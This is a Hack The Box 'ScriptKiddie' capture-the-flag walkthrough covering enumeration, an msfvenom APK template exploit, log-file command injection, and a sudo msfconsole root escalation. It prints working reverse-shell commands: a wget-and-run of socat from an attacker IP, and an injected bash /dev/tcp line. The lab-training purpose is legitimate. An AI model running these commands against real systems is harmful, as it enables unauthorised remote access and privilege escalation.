ScriptKiddie

ScriptKiddie is an easy machine from Hack The Box.

Enumeration

I start with a quick nmap scan to enumerate open ports.

nmap -sC -sV -oN nmap/basic scriptkiddie.htb

The results indicate a pretty barebones machine, only ports 22 and 5000 are open.

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
|   256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_  256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-server-header: Werkzeug/0.16.1 Python/3.8.5
|_http-title: k1d'5 h4ck3r t00l5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

I ran a couple gobuster searches in the background to enumerate web directories or possible subdomains but I didn’t find anything

The webpage appeared to have a few different functionalities. It seems like it will run an nmap scan, create msfvenom payloads or search via searchsploit for user inputs.

Webpage

Initial Foothold

After searching for information about the backend system, I found an RCE script for Werkzeuk but it did not seem to work as the debugging function in question is not enabled on the server.

Pasted image 20210603130610

The msfvenom widget has Android templates as an optional file upload and, after a bit of googling, I found this script

Essentially, it exploits a vulnerability in msfvenom that will execute a payload hidden inside a .apk template. I used apk.py to generate the malicious package.

Pasted image 20210604102216

I tried a few various bash reverse shells as my payload, but using socat was what got me onto the machine.

wget -q http://10.10.14.16/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.16:4444

Pasted image 20210604101927

I am on as the user kid.

Privesc

I did some poking around the filesystem, ran linPEAS, and found indications of a possible sudo vulnerability, but that ended up being a dead-end.

Inside the user pwn directory, there is a script called scanlosers.sh. As far as I can tell, the script takes data from the file /home/kid/logs/hackers to run an nmap command.

Pasted image 20210604121547

I can write to hackers because kid is the owner.

Pasted image 20210604121933

So, I started a listener and used echo to place a reverse shell into hackers, with a ; at the beginning to start a new command and a # at the end to comment out the rest of the script.

echo " ; /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.16/1234 0>&1' #" >> hackers

Pasted image 20210604122051

Now, I’m on as user pwn.

I ran a quick sudo -l to check pwn’s permissions.

Pasted image 20210604122204

The results indicate that I can run msfconsole as root without a password.

Checking the msfconsole help page, I found a -x flag that will execute console commands.

sudo msfconsole -x su

Pasted image 20210604122329

Root access!

Written on June 5, 2021